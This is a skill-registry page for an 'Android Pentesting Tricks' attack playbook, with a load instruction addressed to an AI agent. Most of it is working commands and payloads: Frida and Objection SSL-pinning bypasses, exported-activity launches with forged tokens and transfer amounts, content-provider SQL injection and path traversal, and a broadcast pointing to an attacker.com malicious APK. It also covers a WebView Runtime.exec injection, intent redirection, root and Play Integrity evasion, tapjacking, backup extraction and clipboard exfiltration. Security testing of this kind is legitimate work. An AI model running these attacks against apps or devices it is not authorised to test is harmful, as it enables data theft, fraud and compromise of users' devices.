android-pentesting-tricks

仓库: yaklang/hack-skills
安装量: 598
排名: #6070

安装

npx skills add https://github.com/yaklang/hack-skills --skill android-pentesting-tricks
SKILL: Android Pentesting Tricks — Expert Attack Playbook
AI LOAD INSTRUCTION
Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains. 0. RELATED ROUTING Before going deep, consider loading: mobile-ssl-pinning-bypass for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks ios-pentesting-tricks when also testing the iOS version of the same app api-sec for backend API security testing once traffic is intercepted Advanced Reference Also load FRIDA_SCRIPTS.md when you need: Ready-to-use Frida script templates for common Android testing tasks Detailed hook points for OkHttp, Retrofit, Volley, WebView Root detection bypass script collection 1. SSL PINNING BYPASS 1.1 Frida Universal Bypass

Install Frida server on device

adb push frida-server-16.x.x-android-arm64 /data/local/tmp/ adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64" adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"

Universal SSL pinning bypass

frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause Hook Point Library/Class Coverage X509TrustManager.checkServerTrusted Android SDK All standard HTTPS OkHttpClient.Builder.sslSocketFactory OkHttp 3.x/4.x Square OkHttp CertificatePinner.check OkHttp 3.x/4.x OkHttp pinning HttpsURLConnection.setSSLSocketFactory Android SDK Legacy HTTPS SSLContext.init Android SDK Custom SSL contexts WebViewClient.onReceivedSslError WebView WebView SSL errors TrustManagerFactory.getTrustManagers Android SDK Factory-created TMs 1.2 Objection (Quick Method) objection -g com.target.app explore

Inside Objection REPL:

android sslpinning disable 1.3 Network Security Config (Debug Builds) If you can modify the APK or it's a debug build:

< network-security-config

< debug-overrides

< trust-anchors

< certificates src = " user " />

</ trust-anchors

</ debug-overrides

</ network-security-config

1.4 Magisk Module Approach Module Method Scope LSPosed + TrustMeAlready Hooks system-wide TrustManager All apps LSPosed + SSLUnpinning Targeted SSL bypass Per-app MagiskTrustUserCerts Moves user CA to system store All apps trusting system CAs ConscryptTrustUserCerts Patches Conscrypt Newer Android (7+) 2. COMPONENT EXPOSURE 2.1 Exported Activities

Find exported activities (AndroidManifest.xml or aapt)

aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

Launch exported activity directly

adb shell am start -n com.target.app/.AdminActivity adb shell am start -n com.target.app/.DeepLinkActivity \ -d "target://callback?token=attacker_token"

With extra data

adb shell am start -n com.target.app/.TransferActivity \ --es "amount" "99999" --es "recipient" "attacker" 2.2 Content Providers

Query exposed content providers

adb shell content query --uri content://com.target.app.provider/users

SQL injection in content provider

adb shell content query --uri "content://com.target.app.provider/users" \ --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

Path traversal in file-providing content provider

adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts" Provider Type Attack Vector Impact Database-backed SQL injection via query() projection/selection Data leak, auth bypass File-backed Path traversal via URI Read arbitrary files Parcelable Type confusion in custom Parcelable Code execution 2.3 Broadcast Receivers

Send crafted broadcast

adb shell am broadcast -a com.target.app.ACTION_UPDATE \ --es "url" "http://attacker.com/malicious.apk"

Ordered broadcast interception (higher priority receiver intercepts first)

Register receiver with higher priority than target to intercept/modify data

2.4 Exported Services

Start/bind to exported service

adb shell am startservice -n com.target.app/.BackgroundService \ --es "command" "exfiltrate"

List running services

adb shell dumpsys activity services | grep com.target 3. WEBVIEW VULNERABILITIES 3.1 JavaScript Interface RCE (Pre-API 17) // Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation webView . addJavascriptInterface ( new JSInterface ( ) , "android" ) ; // Pre-API 17: Reflection-based RCE via injected JavaScript // Inject into WebView: // android.getClass().forName('java.lang.Runtime') // .getMethod('getRuntime').invoke(null).exec('id') 3.2 Modern WebView Attacks Vulnerability Condition Exploit setJavaScriptEnabled(true) + untrusted content JS enabled + attacker controls loaded URL XSS → bridge access setAllowFileAccessFromFileURLs(true) file:// can read other file:// Load file:///data/data/com.target/... setAllowUniversalAccessFromFileURLs(true) file:// can access any origin Exfiltrate via XHR to attacker loadUrl(user_controlled) User input in loadUrl javascript: scheme or file:// shouldOverrideUrlLoading bypass Incomplete URL validation Redirect to attacker-controlled page evaluateJavascript with tainted data User data in JS execution XSS in WebView context 3.3 Deep Link to WebView Chain 1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html 2. App opens WebView with attacker URL 3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod() 4. Bridge executes in app context with app's permissions 4. INTENT REDIRECTION Exported activity receives an Intent and starts another (internal) activity using data from the received Intent. // Vulnerable pattern: Intent received = getIntent ( ) ; Intent redirect = ( Intent ) received . getParcelableExtra ( "next_intent" ) ; startActivity ( redirect ) ; // Attacker controls "next_intent" → can start any internal activity

Exploit: start non-exported internal activity via redirection

adb shell am start -n com.target.app/.ExportedActivity \ --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end" Pattern Indicator Risk getParcelableExtra → startActivity Intent-in-Intent Start non-exported activities getStringExtra("url") → startActivity(Intent.ACTION_VIEW) URL forwarding Open arbitrary URLs getStringExtra("class") → Class.forName → startActivity Dynamic class loading Start any activity by name 5. ROOT DETECTION BYPASS 5.1 Common Root Detection Checks Check What It Detects Frida Bypass su binary exists /system/xbin/su , /sbin/su Hook File.exists() → return false Build tags contain "test-keys" Build.TAGS Hook Build.TAGS → return "release-keys" Magisk Manager installed Package name check Hook PackageManager.getPackageInfo Superuser.apk present Su management app Hook File.exists() RootBeer library Multi-check root detection Hook all RootBeer check methods SafetyNet/Play Integrity Server-side attestation Requires Magisk DenyList + module Abnormal system properties ro.debuggable=1 , etc. Hook SystemProperties.get 5.2 Magisk DenyList (Previously MagiskHide)

Enable DenyList in Magisk Manager

Add target app to DenyList — Magisk hides itself from that app

Covers: su binary, Magisk Manager package, mount points, props

  1. PLAY INTEGRITY / SAFETYNET BYPASS Level What It Checks Bypass Difficulty Basic Integrity Not rooted, not emulator Easy (Magisk + DenyList) Device Integrity Bootloader locked, verified boot Hard (requires locked bootloader) Strong Integrity Hardware-backed attestation Very hard (hardware TEE) Techniques: Magisk with Zygisk enabled + DenyList for target app Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint Shamiko module: hides root from specific apps Custom ROM with locked bootloader (Pixel-specific tricks)
  2. TAPJACKING (OVERLAY ATTACKS)

< activity android: name = " .OverlayActivity " android: theme = " @style/TransparentTheme " android: excludeFromRecents = " true "

</ activity

Android Version Protection Bypass Pre-6.0 None Full overlay 6.0–11 filterTouchesWhenObscured (opt-in) Apps not using it are vulnerable 12+ Untrusted touches blocked for overlay windows Partial overlays, timing-based 8. BACKUP EXTRACTION

Check if backup allowed

aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup

android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)

Extract backup

adb backup -f backup.ab -apk com.target.app

Convert to tar

dd if = backup.ab bs = 24 skip = 1 | openssl zlib -d

backup.tar tar xf backup.tar

Analyze extracted data

find com.target.app -name ".db" -o -name ".xml" -o -name "*.json"

Check shared_prefs/ for tokens, credentials

Check databases/ for SQLite DBs with sensitive data

  1. ADDITIONAL TRICKS 9.1 Debuggable App Exploitation

If android:debuggable="true" in manifest

adb shell run-as com.target.app

Now running as the app's user — full data directory access

cat /data/data/com.target.app/shared_prefs/*.xml 9.2 Drozer (Component Testing Framework)

List attack surface

dz

run app.package.attacksurface com.target.app

Exported Activities: 3

Exported Services: 1

Exported Providers: 2

Query provider

dz

run app.provider.query content://com.target.app.provider/users

Scan for injection

dz

run scanner.provider.injection -a com.target.app 9.3 Clipboard Sniffing // Pre-Android 10: any app can read clipboard ClipboardManager cm = ( ClipboardManager ) getSystemService ( CLIPBOARD_SERVICE ) ; cm . addPrimaryClipChangedListener ( ( ) -> { ClipData data = cm . getPrimaryClip ( ) ; // Exfiltrate copied passwords, tokens, etc. } ) ; 10. ANDROID PENTESTING DECISION TREE Testing Android application │ ├── Can intercept HTTPS traffic? │ ├── No → SSL pinning in place │ │ ├── Frida available? → universal SSL bypass script (§1.1) │ │ ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4) │ │ ├── Debug build? → Network Security Config (§1.3) │ │ └── None above? → manual decompile + patch + repackage │ └── Yes → proceed to traffic analysis │ ├── Exported components found? │ ├── Exported Activities → test direct launch, deeplink abuse (§2.1) │ ├── Content Providers → SQLi, path traversal (§2.2) │ ├── Broadcast Receivers → crafted intent injection (§2.3) │ └── Services → unauthorized service binding (§2.4) │ ├── WebView present? │ ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1) │ ├── File access enabled? → file:// scheme abuse (§3.2) │ └── Deep link → WebView? → URL injection chain (§3.3) │ ├── Intent handling found? │ └── Intent-in-Intent pattern? → redirect to internal activity (§4) │ ├── Root detection blocking testing? │ ├── Client-side checks only? → Frida hook bypass (§5.1) │ ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6) │ └── Custom obfuscated checks? → reverse engineer + targeted hooks │ ├── Sensitive data storage? │ ├── allowBackup=true? → ADB backup extraction (§8) │ ├── Debuggable? → run-as for direct data access (§9.1) │ └── SharedPreferences → check for plaintext tokens/credentials │ └── UI-based attacks applicable? └── Overlay possible? → tapjacking (§7)

返回排行榜